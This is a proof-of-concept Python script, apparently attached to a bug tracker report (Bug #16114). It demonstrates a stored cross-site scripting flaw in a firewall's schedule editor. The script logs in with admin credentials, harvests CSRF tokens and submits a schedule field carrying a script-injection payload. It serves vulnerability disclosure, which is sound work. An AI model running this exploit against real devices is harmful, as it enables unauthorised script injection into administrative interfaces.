Project

General

Profile

Download (1.67 KB)

Bug #16114 ยป poc-xss-fwsched-16114.py

Jim Pingle, 04/01/2025 04:47 PM

 
1 
#!/usr/bin/env python3
2 
import requests
3 
requests.packages.urllib3.disable_warnings()
4 
from bs4 import BeautifulSoup
5 

    		
  

  

    
      6
    
    
      
baseurl  = 'https://198.51.100.34'


    		
  

  

    
      7
    
    
      

    		
  

  

    
      8
    
    
      
target = baseurl + '/firewall_schedule_edit.php'


    		
  

  

    
      9
    
    
      

    		
  

  

    
      10
    
    
      
login_data = {


    		
  

  

    
      11
    
    
      
    'login'        : 'Login',


    		
  

  

    
      12
    
    
      
    'usernamefld'  : 'admin',


    		
  

  

    
      13
    
    
      
    'passwordfld'  : 'pfsense2',


    		
  

  

    
      14
    
    
      
}


    		
  

  

    
      15
    
    
      

    		
  

  

    
      16
    
    
      
target_data = {


    		
  

  

    
      17
    
    
      
	"name": "XSS_Test_Sched",


    		
  

  

    
      18
    
    
      
	"descr": "XSS Test",


    		
  

  

    
      19
    
    
      
	"monthsel": "3",


    		
  

  

    
      20
    
    
      
	"starttimehour": "0",


    		
  

  

    
      21
    
    
      
	"starttimemin": "00",


    		
  

  

    
      22
    
    
      
	"stoptimehour": "23",


    		
  

  

    
      23
    
    
      
	"stoptimemin": "59",


    		
  

  

    
      24
    
    
      
	"timerangedescr": "XSS 1",


    		
  

  

    
      25
    
    
      
	"tempFriendlyTime0": "Sun",


    		
  

  

    
      26
    
    
      
	"starttime0": "0:00",


    		
  

  

    
      27
    
    
      
	"stoptime0": "23:59",


    		
  

  

    
      28
    
    
      
	"timedescr0": "XSS 2",


    		
  

  

    
      29
    
    
      
	"schedule0": "w11p3-m3d12\"><script>alert('XSS')</script>",


    		
  

  

    
      30
    
    
      
	"marker": "",


    		
  

  

    
      31
    
    
      
	"save": "Save"


    		
  

  

    
      32
    
    
      
}


    		
  

  

    
      33
    
    
      

    		
  

  

    
      34
    
    
      
headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}


    		
  

  

    
      35
    
    
      

    		
  

  

    
      36
    
    
      
with requests.Session() as s:


    		
  

  

    
      37
    
    
      
    # Fetch CSRF token from login page


    		
  

  

    
      38
    
    
      
    r = s.get(baseurl, headers=headers, verify=False)


    		
  

  

    
      39
    
    
      

    		
  

  

    
      40
    
    
      
    soup = BeautifulSoup(r.text, 'lxml')


    		
  

  

    
      41
    
    
      
    login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']


    		
  

  

    
      42
    
    
      

    		
  

  

    
      43
    
    
      
    # Login


    		
  

  

    
      44
    
    
      
    r = s.post(baseurl, data=login_data, headers=headers)


    		
  

  

    
      45
    
    
      

    		
  

  

    
      46
    
    
      
    # Find the next CSRF token


    		
  

  

    
      47
    
    
      
    soup = BeautifulSoup(r.text, 'lxml')


    		
  

  

    
      48
    
    
      
    target_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']


    		
  

  

    
      49
    
    
      

    		
  

  

    
      50
    
    
      
    # Submit actual request


    		
  

  

    
      51
    
    
      
    r = s.post(target, data=target_data, headers=headers)


    		
  

  

    
      52
    
    
      

    		
  

  

    
      53
    
    
      
    # Dump input errors from response


    		
  

  

    
      54
    
    
      
    soup = BeautifulSoup(r.text, 'lxml')


    		
  

  

    
      55
    
    
      
    input_errors = [errors.text for errors in soup.select('div.input-errors ul li')]


    		
  

  

    
      56
    
    
      
    if (input_errors):


    		
  

  

    
      57
    
    
      
        print("Input errors:\n")


    		
  

  

    
      58
    
    
      
        for ie in input_errors:


    		
  

  

    
      59
    
    
      
            print("* " + ie + "\n")


    		
  

  

    
      60
    
    
      

    		
  

  

    
      61
    
    
      
print('Done')


    		
  












  
    (1-1/1)